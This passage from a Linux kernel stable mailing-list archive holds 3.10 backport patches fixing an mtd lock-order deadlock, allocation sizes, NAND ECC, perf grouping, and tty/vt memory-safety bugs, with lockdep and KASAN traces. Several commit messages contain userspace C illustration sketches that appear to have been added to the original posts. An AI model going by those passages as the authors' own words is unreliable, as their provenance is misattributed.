  [   53.617211]        [<c03da868>] device_for_each_child+0x50/0x7c
  [   53.623387]        [<c046eae8>] spi_unregister_master+0x58/0x8c
  [   53.629578]        [<c03e12f0>] release_nodes+0x15c/0x1c8
  [   53.635223]        [<c03de0f8>] __device_release_driver+0x90/0x114
  [   53.641689]        [<c03de900>] driver_detach+0xb4/0xb8
  [   53.647147]        [<c03ddc78>] bus_remove_driver+0x4c/0xa0
  [   53.652970]        [<c00cab50>] SyS_delete_module+0x11c/0x1e4
  [   53.658976]        [<c000f740>] ret_fast_syscall+0x0/0x1c
  [   53.664621]
  [   53.664621] other info that might help us debug this:
  [   53.664621]
  [   53.672979]  Possible unsafe locking scenario:
  [   53.672979]
  [   53.679169]        CPU0                    CPU1
  [   53.683900]        ----                    ----
  [   53.688633]   lock(mtd_table_mutex);
  [   53.692383]                                lock(&new->lock);
  [   53.698306]                                lock(mtd_table_mutex);
  [   53.704658]   lock(&new->lock);
  [   53.707946]
  [   53.707946]  *** DEADLOCK ***

Fixes: 073db4a51ee4 ("mtd: fix: avoid race condition when accessing mtd->usecount")
Reported-by: Felipe Balbi <balbi@ti.com>
Tested-by: Felipe Balbi <balbi@ti.com>
Signed-off-by: Brian Norris <computersforpeace@gmail.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/mtd/mtd_blkdevs.c | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/drivers/mtd/mtd_blkdevs.c b/drivers/mtd/mtd_blkdevs.c
index 32d5e40..48b63e8 100644
--- a/drivers/mtd/mtd_blkdevs.c
+++ b/drivers/mtd/mtd_blkdevs.c
@@ -198,8 +198,8 @@ static int blktrans_open(struct block_device *bdev, fmode_t mode)
 	if (!dev)
 		return -ERESTARTSYS; /* FIXME: busy loop! -arnd*/
 
-	mutex_lock(&dev->lock);
 	mutex_lock(&mtd_table_mutex);
+	mutex_lock(&dev->lock);
 
 	if (dev->open)
 		goto unlock;
@@ -223,8 +223,8 @@ static int blktrans_open(struct block_device *bdev, fmode_t mode)
 
 unlock:
 	dev->open++;
-	mutex_unlock(&mtd_table_mutex);
 	mutex_unlock(&dev->lock);
+	mutex_unlock(&mtd_table_mutex);
 	blktrans_dev_put(dev);
 	return ret;
 
@@ -234,8 +234,8 @@ error_release:
 error_put:
 	module_put(dev->tr->owner);
 	kref_put(&dev->ref, blktrans_dev_release);
-	mutex_unlock(&mtd_table_mutex);
 	mutex_unlock(&dev->lock);
+	mutex_unlock(&mtd_table_mutex);
 	blktrans_dev_put(dev);
 	return ret;
 }
@@ -247,8 +247,8 @@ static void blktrans_release(struct gendisk *disk, fmode_t mode)
 	if (!dev)
 		return;
 
-	mutex_lock(&dev->lock);
 	mutex_lock(&mtd_table_mutex);
+	mutex_lock(&dev->lock);
 
 	if (--dev->open)
 		goto unlock;
@@ -262,8 +262,8 @@ static void blktrans_release(struct gendisk *disk, fmode_t mode)
 		__put_mtd_device(dev->mtd);
 	}
 unlock:
-	mutex_unlock(&mtd_table_mutex);
 	mutex_unlock(&dev->lock);
+	mutex_unlock(&mtd_table_mutex);
 	blktrans_dev_put(dev);
 }
 
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 208/319] mtd: pmcmsp-flash: Allocating too much in init_msp_flash()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (106 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 207/319] mtd: blkdevs: fix potential deadlock + lockdep warnings Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 209/319] mtd: nand: davinci: Reinitialize the HW ECC engine in 4bit hwctl Willy Tarreau
                   ` (110 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Dan Carpenter, Brian Norris, Willy Tarreau

From: Dan Carpenter <dan.carpenter@oracle.com>

commit 79ad07d45743721010e766e65dc004ad249bd429 upstream.

There is a cut and paste issue here.  The bug is that we are allocating
more memory than necessary for msp_maps.  We should be allocating enough
space for a map_info struct (144 bytes) but we instead allocate enough
for an mtd_info struct (1840 bytes).  It's a small waste.

The other part of this is not harmful: when we allocated msp_flash, we
allocated enough space for a map_info pointer instead of an mtd_info
pointer.  Since pointers are the same size, it works out fine.

Anyway, I decided to clean up all three allocations a bit to make them
a bit more consistent and clear.
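
The idiom used for the cleanup can be sketched in userspace C as follows.
This is only an illustration under stated assumptions: struct demo_map and
struct demo_info are hypothetical stand-ins sized to match the 144 and 1840
bytes quoted above, calloc() stands in for kcalloc(), and alloc_maps() and
wasted_bytes() are made-up helper names.

```c
#include <stdlib.h>

/* Hypothetical stand-ins; the sizes mirror the figures quoted above. */
struct demo_map  { char bytes[144]; };
struct demo_info { char bytes[1840]; };

/*
 * sizeof(*maps) follows the pointer's own type, so a copy-and-paste
 * slip such as sizeof(struct demo_info) cannot creep in.
 */
static struct demo_map *alloc_maps(size_t count)
{
	struct demo_map *maps;

	maps = calloc(count, sizeof(*maps));
	return maps;
}

/* Bytes over-allocated when the wrong struct is named in sizeof(). */
static size_t wasted_bytes(size_t count)
{
	return count * (sizeof(struct demo_info) - sizeof(struct demo_map));
}
```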

Fixes: 68aa0fa87f6d ('[MTD] PMC MSP71xx flash/rootfs mappings')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Brian Norris <computersforpeace@gmail.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/mtd/maps/pmcmsp-flash.c | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/drivers/mtd/maps/pmcmsp-flash.c b/drivers/mtd/maps/pmcmsp-flash.c
index 744ca5c..f9fa3fa 100644
--- a/drivers/mtd/maps/pmcmsp-flash.c
+++ b/drivers/mtd/maps/pmcmsp-flash.c
@@ -75,15 +75,15 @@ static int __init init_msp_flash(void)
 
 	printk(KERN_NOTICE "Found %d PMC flash devices\n", fcnt);
 
-	msp_flash = kmalloc(fcnt * sizeof(struct map_info *), GFP_KERNEL);
+	msp_flash = kcalloc(fcnt, sizeof(*msp_flash), GFP_KERNEL);
 	if (!msp_flash)
 		return -ENOMEM;
 
-	msp_parts = kmalloc(fcnt * sizeof(struct mtd_partition *), GFP_KERNEL);
+	msp_parts = kcalloc(fcnt, sizeof(*msp_parts), GFP_KERNEL);
 	if (!msp_parts)
 		goto free_msp_flash;
 
-	msp_maps = kcalloc(fcnt, sizeof(struct mtd_info), GFP_KERNEL);
+	msp_maps = kcalloc(fcnt, sizeof(*msp_maps), GFP_KERNEL);
 	if (!msp_maps)
 		goto free_msp_parts;
 
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 209/319] mtd: nand: davinci: Reinitialize the HW ECC engine in 4bit hwctl
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (107 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 208/319] mtd: pmcmsp-flash: Allocating too much in init_msp_flash() Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 210/319] perf symbols: Fixup symbol sizes before picking best ones Willy Tarreau
                   ` (109 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Karl Beldan, Brian Norris, Willy Tarreau

From: Karl Beldan <kbeldan@baylibre.com>

commit f6d7c1b5598b6407c3f1da795dd54acf99c1990c upstream.

This fixes subpage writes when using 4-bit HW ECC.

There have been numerous reports about ECC errors with devices using this
driver for a while.  Also the 4-bit ECC has been reported as broken with
subpages in [1] and with 16-bit NANDs in the driver and in mach* board
files both in mainline and in the vendor BSPs.

What I saw with 4-bit ECC on a 16-bit NAND (on an LCDK) which got me to
try reinitializing the ECC engine:
- R/W on whole pages properly generates/checks RS code
- try writing the 1st subpage only of a blank page, the subpage is well
  written and the RS code properly generated, re-reading the same page
  the HW detects some ECC error, reading the same page again no ECC
  error is detected

Note that the ECC engine is already reinitialized in the 1-bit case.

Tested on my LCDK with UBI+UBIFS using subpages.
This could potentially get rid of the issue worked around in [1].

[1] 28c015a9daab ("mtd: davinci-nand: disable subpage write for keystone-nand")

Fixes: 6a4123e581b3 ("mtd: nand: davinci_nand, 4-bit ECC for smallpage")
Signed-off-by: Karl Beldan <kbeldan@baylibre.com>
Acked-by: Boris Brezillon <boris.brezillon@free-electrons.com>
Signed-off-by: Brian Norris <computersforpeace@gmail.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/mtd/nand/davinci_nand.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/drivers/mtd/nand/davinci_nand.c b/drivers/mtd/nand/davinci_nand.c
index c3e15a5..e4f16cf 100644
--- a/drivers/mtd/nand/davinci_nand.c
+++ b/drivers/mtd/nand/davinci_nand.c
@@ -241,6 +241,9 @@ static void nand_davinci_hwctl_4bit(struct mtd_info *mtd, int mode)
 	unsigned long flags;
 	u32 val;
 
+	/* Reset ECC hardware */
+	davinci_nand_readl(info, NAND_4BIT_ECC1_OFFSET);
+
 	spin_lock_irqsave(&davinci_nand_lock, flags);
 
 	/* Start 4-bit ECC calculation for read/write */
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 210/319] perf symbols: Fixup symbol sizes before picking best ones
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (108 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 209/319] mtd: nand: davinci: Reinitialize the HW ECC engine in 4bit hwctl Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 211/319] perf: Tighten (and fix) the grouping condition Willy Tarreau
                   ` (108 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Arnaldo Carvalho de Melo, Anton Blanchard, Adrian Hunter,
	David Ahern, Jiri Olsa, Masami Hiramatsu, Namhyung Kim, Wang Nan,
	Willy Tarreau

From: Arnaldo Carvalho de Melo <acme@redhat.com>

commit 432746f8e0b6a82ba832b771afe31abd51af6752 upstream.

When we call symbol__fixup_duplicate() we use algorithms to pick the
"best" symbols for cases where there are various functions/aliases to an
address, and those check zero size symbols, which, before calling
symbol__fixup_end() are _all_ symbols in a just parsed kallsyms file.

So first fixup the end, then fixup the duplicates.

Found while trying to figure out why 'perf test vmlinux' failed, see the
output of 'perf test -v vmlinux' to see cases where the symbols picked
as best for vmlinux don't match the ones picked for kallsyms.

Cc: Anton Blanchard <anton@samba.org>
Cc: Adrian Hunter <adrian.hunter@intel.com>
Cc: David Ahern <dsahern@gmail.com>
Cc: Jiri Olsa <jolsa@kernel.org>
Cc: Masami Hiramatsu <mhiramat@kernel.org>
Cc: Namhyung Kim <namhyung@kernel.org>
Cc: Wang Nan <wangnan0@huawei.com>
Fixes: 694bf407b061 ("perf symbols: Add some heuristics for choosing the best duplicate symbol")
Link: http://lkml.kernel.org/n/tip-rxqvdgr0mqjdxee0kf8i2ufn@git.kernel.org
Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 tools/perf/util/symbol-elf.c | 2 +-
 tools/perf/util/symbol.c     | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/tools/perf/util/symbol-elf.c b/tools/perf/util/symbol-elf.c
index 4b12bf8..f7718c8 100644
--- a/tools/perf/util/symbol-elf.c
+++ b/tools/perf/util/symbol-elf.c
@@ -831,8 +831,8 @@ new_symbol:
 	 * For misannotated, zeroed, ASM function sizes.
 	 */
 	if (nr > 0) {
-		symbols__fixup_duplicate(&dso->symbols[map->type]);
 		symbols__fixup_end(&dso->symbols[map->type]);
+		symbols__fixup_duplicate(&dso->symbols[map->type]);
 		if (kmap) {
 			/*
 			 * We need to fixup this here too because we create new
diff --git a/tools/perf/util/symbol.c b/tools/perf/util/symbol.c
index 8cf3b54..a2fe760 100644
--- a/tools/perf/util/symbol.c
+++ b/tools/perf/util/symbol.c
@@ -673,8 +673,8 @@ int dso__load_kallsyms(struct dso *dso, const char *filename,
 	if (dso__load_all_kallsyms(dso, filename, map) < 0)
 		return -1;
 
-	symbols__fixup_duplicate(&dso->symbols[map->type]);
 	symbols__fixup_end(&dso->symbols[map->type]);
+	symbols__fixup_duplicate(&dso->symbols[map->type]);
 
 	if (dso->kernel == DSO_TYPE_GUEST_KERNEL)
 		dso->symtab_type = DSO_BINARY_TYPE__GUEST_KALLSYMS;
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 211/319] perf: Tighten (and fix) the grouping condition
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (109 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 210/319] perf symbols: Fixup symbol sizes before picking best ones Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 212/319] tty: Prevent ldisc drivers from re-using stale tty fields Willy Tarreau
                   ` (107 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Peter Zijlstra, Arnaldo Carvalho de Melo, Jiri Olsa,
	Linus Torvalds, Ingo Molnar, Willy Tarreau

From: Peter Zijlstra <peterz@infradead.org>

commit c3c87e770458aa004bd7ed3f29945ff436fd6511 upstream.

The fix from 9fc81d87420d ("perf: Fix events installation during
moving group") was incomplete in that it failed to recognise that
creating a group with events for different CPUs is semantically
broken -- they cannot be co-scheduled.

Furthermore, it leads to real breakage where, when we create an event
for CPU Y and then migrate it to form a group on CPU X, the code gets
confused where the counter is programmed -- triggered in practice
as well by me via the perf fuzzer.

Fix this by tightening the rules for creating groups. Only allow
grouping of counters that can be co-scheduled in the same context.
This means for the same task and/or the same cpu.
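
The tightened rule can be sketched as a small predicate. This is a hedged
userspace illustration, not the kernel code: struct demo_event and
can_group() are hypothetical names, with the task pointer standing in for
ctx->task and the cpu field for event->cpu.

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical, simplified view of an event for illustration only. */
struct demo_event {
	const void *task;	/* NULL for a per-cpu event */
	int cpu;		/* -1 when not bound to a specific cpu */
};

/*
 * Two events may be grouped only if they can be co-scheduled:
 * same task (or both per-cpu) and the same cpu.
 */
static bool can_group(const struct demo_event *leader,
		      const struct demo_event *event)
{
	if (leader->task != event->task)
		return false;
	if (leader->cpu != event->cpu)
		return false;
	return true;
}
```

Under this rule an event created for CPU Y can no longer be moved into a
group whose leader is bound to CPU X.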

Fixes: 9fc81d87420d ("perf: Fix events installation during moving group")
Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
Cc: Arnaldo Carvalho de Melo <acme@kernel.org>
Cc: Jiri Olsa <jolsa@redhat.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Link: http://lkml.kernel.org/r/20150123125834.090683288@infradead.org
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/perf_event.h |  6 ------
 kernel/events/core.c       | 15 +++++++++++++--
 2 files changed, 13 insertions(+), 8 deletions(-)

diff --git a/include/linux/perf_event.h b/include/linux/perf_event.h
index 229a757..3204422 100644
--- a/include/linux/perf_event.h
+++ b/include/linux/perf_event.h
@@ -430,11 +430,6 @@ struct perf_event {
 #endif /* CONFIG_PERF_EVENTS */
 };
 
-enum perf_event_context_type {
-	task_context,
-	cpu_context,
-};
-
 /**
  * struct perf_event_context - event context structure
  *
@@ -442,7 +437,6 @@ enum perf_event_context_type {
  */
 struct perf_event_context {
 	struct pmu			*pmu;
-	enum perf_event_context_type	type;
 	/*
 	 * Protect the states of the events in the list,
 	 * nr_active, and the list:
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 0f52078..76e26b8 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -6249,7 +6249,6 @@ skip_type:
 		__perf_event_init_context(&cpuctx->ctx);
 		lockdep_set_class(&cpuctx->ctx.mutex, &cpuctx_mutex);
 		lockdep_set_class(&cpuctx->ctx.lock, &cpuctx_lock);
-		cpuctx->ctx.type = cpu_context;
 		cpuctx->ctx.pmu = pmu;
 		cpuctx->jiffies_interval = 1;
 		INIT_LIST_HEAD(&cpuctx->rotation_list);
@@ -6856,7 +6855,19 @@ SYSCALL_DEFINE5(perf_event_open,
 		 * task or CPU context:
 		 */
 		if (move_group) {
-			if (group_leader->ctx->type != ctx->type)
+			/*
+			 * Make sure we're both on the same task, or both
+			 * per-cpu events.
+			 */
+			if (group_leader->ctx->task != ctx->task)
+				goto err_context;
+
+			/*
+			 * Make sure we're both events for the same CPU;
+			 * grouping events for different CPUs is broken; since
+			 * you can never concurrently schedule them anyhow.
+			 */
+			if (group_leader->cpu != event->cpu)
 				goto err_context;
 		} else {
 			if (group_leader->ctx != ctx)
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 212/319] tty: Prevent ldisc drivers from re-using stale tty fields
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (110 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 211/319] perf: Tighten (and fix) the grouping condition Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 213/319] tty: limit terminal size to 4M chars Willy Tarreau
                   ` (106 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Peter Hurley, Tilman Schmidt, Sasha Levin, Greg Kroah-Hartman,
	Willy Tarreau

From: Peter Hurley <peter@hurleysoftware.com>

commit dd42bf1197144ede075a9d4793123f7689e164bc upstream.

Line discipline drivers may mistakenly misuse ldisc-related fields
when initializing. For example, a failure to initialize tty->receive_room
in the N_GIGASET_M101 line discipline was recently found and fixed [1].
Now, the N_X25 line discipline has been discovered accessing the previous
line discipline's already-freed private data [2].

Harden the ldisc interface against misuse by initializing relevant
tty fields before instancing the new line discipline.

[1]
    commit fd98e9419d8d622a4de91f76b306af6aa627aa9c
    Author: Tilman Schmidt <tilman@imap.cc>
    Date:   Tue Jul 14 00:37:13 2015 +0200

    isdn/gigaset: reset tty->receive_room when attaching ser_gigaset

[2] Report from Sasha Levin <sasha.levin@oracle.com>
    [  634.336761] ==================================================================
    [  634.338226] BUG: KASAN: use-after-free in x25_asy_open_tty+0x13d/0x490 at addr ffff8800a743efd0
    [  634.339558] Read of size 4 by task syzkaller_execu/8981
    [  634.340359] =============================================================================
    [  634.341598] BUG kmalloc-512 (Not tainted): kasan: bad access detected
    ...
    [  634.405018] Call Trace:
    [  634.405277] dump_stack (lib/dump_stack.c:52)
    [  634.405775] print_trailer (mm/slub.c:655)
    [  634.406361] object_err (mm/slub.c:662)
    [  634.406824] kasan_report_error (mm/kasan/report.c:138 mm/kasan/report.c:236)
    [  634.409581] __asan_report_load4_noabort (mm/kasan/report.c:279)
    [  634.411355] x25_asy_open_tty (drivers/net/wan/x25_asy.c:559 (discriminator 1))
    [  634.413997] tty_ldisc_open.isra.2 (drivers/tty/tty_ldisc.c:447)
    [  634.414549] tty_set_ldisc (drivers/tty/tty_ldisc.c:567)
    [  634.415057] tty_ioctl (drivers/tty/tty_io.c:2646 drivers/tty/tty_io.c:2879)
    [  634.423524] do_vfs_ioctl (fs/ioctl.c:43 fs/ioctl.c:607)
    [  634.427491] SyS_ioctl (fs/ioctl.c:622 fs/ioctl.c:613)
    [  634.427945] entry_SYSCALL_64_fastpath (arch/x86/entry/entry_64.S:188)

Cc: Tilman Schmidt <tilman@imap.cc>
Cc: Sasha Levin <sasha.levin@oracle.com>
Signed-off-by: Peter Hurley <peter@hurleysoftware.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[wt: adjust context]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/tty/tty_ldisc.c | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/drivers/tty/tty_ldisc.c b/drivers/tty/tty_ldisc.c
index 1afe192..b5cbe12 100644
--- a/drivers/tty/tty_ldisc.c
+++ b/drivers/tty/tty_ldisc.c
@@ -400,6 +400,10 @@ EXPORT_SYMBOL_GPL(tty_ldisc_flush);
  *	they are not on hot paths so a little discipline won't do
  *	any harm.
  *
+ *	The line discipline-related tty_struct fields are reset to
+ *	prevent the ldisc driver from re-using stale information for
+ *	the new ldisc instance.
+ *
  *	Locking: takes termios_mutex
  */
 
@@ -408,6 +412,9 @@ static void tty_set_termios_ldisc(struct tty_struct *tty, int num)
 	mutex_lock(&tty->termios_mutex);
 	tty->termios.c_line = num;
 	mutex_unlock(&tty->termios_mutex);
+
+	tty->disc_data = NULL;
+	tty->receive_room = 0;
 }
 
 /**
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 213/319] tty: limit terminal size to 4M chars
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (111 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 212/319] tty: Prevent ldisc drivers from re-using stale tty fields Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 214/319] tty: vt, fix bogus division in csi_J Willy Tarreau
                   ` (105 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Dmitry Vyukov, David Rientjes, One Thousand Gnomes,
	Greg Kroah-Hartman, Jiri Slaby, Peter Hurley, syzkaller,
	Willy Tarreau

From: Dmitry Vyukov <dvyukov@google.com>

commit 32b2921e6a7461fe63b71217067a6cf4bddb132f upstream.

The size passed to kmalloc() in vc_do_resize() is controlled by the user.
Too large a kmalloc() size triggers a WARNING message on the console.
Put a reasonable upper bound on the terminal size to prevent the WARNINGs.
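
A minimal userspace sketch of the same idea, rejecting an oversized
user-controlled size before it reaches the allocator. The names
example_resize() and EXAMPLE_MAX_SCREEN_BYTES are assumptions made for
illustration, and malloc() stands in for kmalloc().

```c
#include <errno.h>
#include <stddef.h>
#include <stdlib.h>

/* Upper bound mirroring the (4 << 20) check in the patch. */
#define EXAMPLE_MAX_SCREEN_BYTES ((size_t)4 << 20)

/*
 * Allocate a screen buffer of new_size bytes. Sizes above the bound
 * are rejected with -EINVAL before the allocator is ever called;
 * *out is written only on success.
 */
int example_resize(size_t new_size, void **out)
{
	void *buf;

	if (new_size > EXAMPLE_MAX_SCREEN_BYTES)
		return -EINVAL;

	buf = malloc(new_size);
	if (!buf)
		return -ENOMEM;

	*out = buf;
	return 0;
}
```

Checking the bound first means the caller gets a clean error instead of
the allocator complaining about an unreasonable request.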

Signed-off-by: Dmitry Vyukov <dvyukov@google.com>
CC: David Rientjes <rientjes@google.com>
Cc: One Thousand Gnomes <gnomes@lxorguk.ukuu.org.uk>
Cc: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Cc: Jiri Slaby <jslaby@suse.com>
Cc: Peter Hurley <peter@hurleysoftware.com>
Cc: linux-kernel@vger.kernel.org
Cc: syzkaller@googlegroups.com
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/tty/vt/vt.c | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/drivers/tty/vt/vt.c b/drivers/tty/vt/vt.c
index 6dff194..ee51acd 100644
--- a/drivers/tty/vt/vt.c
+++ b/drivers/tty/vt/vt.c
@@ -863,6 +863,8 @@ static int vc_do_resize(struct tty_struct *tty, struct vc_data *vc,
 	if (new_cols == vc->vc_cols && new_rows == vc->vc_rows)
 		return 0;
 
+	if (new_screen_size > (4 << 20))
+		return -EINVAL;
 	newscreen = kmalloc(new_screen_size, GFP_USER);
 	if (!newscreen)
 		return -ENOMEM;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 214/319] tty: vt, fix bogus division in csi_J
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (112 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 213/319] tty: limit terminal size to 4M chars Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 215/319] vt: clear selection before resizing Willy Tarreau
                   ` (104 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Jiri Slaby, Petr Písař, Greg Kroah-Hartman, Willy Tarreau

From: Jiri Slaby <jslaby@suse.cz>

commit 42acfc6615f47e465731c263bee0c799edb098f2 upstream.

In csi_J(3), the third parameter of scr_memsetw (vc_screenbuf_size) is
divided by 2 inappropriately. But scr_memsetw expects a size, not a
count, because it divides the size by 2 on its own before doing the actual
memset-by-words.

So remove the bogus division.
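
To illustrate why the extra division clears only half the buffer, here is a
small sketch of a memset-by-words helper that takes a size in bytes.
example_memsetw() is a hypothetical stand-in written for this note, not the
kernel's scr_memsetw().

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Fill a buffer of 16-bit cells with value c. The third argument is a
 * size in bytes; the helper converts it to a word count itself, so the
 * caller must not pre-divide it.
 */
void example_memsetw(uint16_t *s, uint16_t c, size_t size_bytes)
{
	size_t words = size_bytes / 2;

	while (words--)
		*s++ = c;
}
```

Passing sizeof(buf) fills every cell, while passing sizeof(buf) / 2 leaves
the second half of the buffer untouched, which is the behaviour the patch
removes.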

Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Cc: Petr Písař <ppisar@redhat.com>
Fixes: f8df13e0a9 (tty: Clean console safely)
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/tty/vt/vt.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/tty/vt/vt.c b/drivers/tty/vt/vt.c
index ee51acd..5deddca 100644
--- a/drivers/tty/vt/vt.c
+++ b/drivers/tty/vt/vt.c
@@ -1166,7 +1166,7 @@ static void csi_J(struct vc_data *vc, int vpar)
 			break;
 		case 3: /* erase scroll-back buffer (and whole display) */
 			scr_memsetw(vc->vc_screenbuf, vc->vc_video_erase_char,
-				    vc->vc_screenbuf_size >> 1);
+				    vc->vc_screenbuf_size);
 			set_origin(vc);
 			if (CON_IS_VISIBLE(vc))
 				update_screen(vc);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 215/319] vt: clear selection before resizing
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (113 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 214/319] tty: vt, fix bogus division in csi_J Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 216/319] drivers/vfio: Rework offsetofend() Willy Tarreau
                   ` (103 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Scot Doyle, Willy Tarreau

From: Scot Doyle <lkml14@scotdoyle.com>

commit 009e39ae44f4191188aeb6dfbf661b771dbbe515 upstream.

When resizing a vt its selection may exceed the new size, resulting in
an invalid memory access [1]. Clear the selection before resizing.

[1] http://lkml.kernel.org/r/CACT4Y+acDTwy4umEvf5ROBGiRJNrxHN4Cn5szCXE5Jw-d1B=Xw@mail.gmail.com

Reported-and-tested-by: Dmitry Vyukov <dvyukov@google.com>
Signed-off-by: Scot Doyle <lkml14@scotdoyle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/tty/vt/vt.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/drivers/tty/vt/vt.c b/drivers/tty/vt/vt.c
index 5deddca..010ec70 100644
--- a/drivers/tty/vt/vt.c
+++ b/drivers/tty/vt/vt.c
@@ -869,6 +869,9 @@ static int vc_do_resize(struct tty_struct *tty, struct vc_data *vc,
 	if (!newscreen)
 		return -ENOMEM;
 
+	if (vc == sel_cons)
+		clear_selection();
+
 	old_rows = vc->vc_rows;
 	old_row_size = vc->vc_size_row;
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 216/319] drivers/vfio: Rework offsetofend()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (114 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 215/319] vt: clear selection before resizing Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
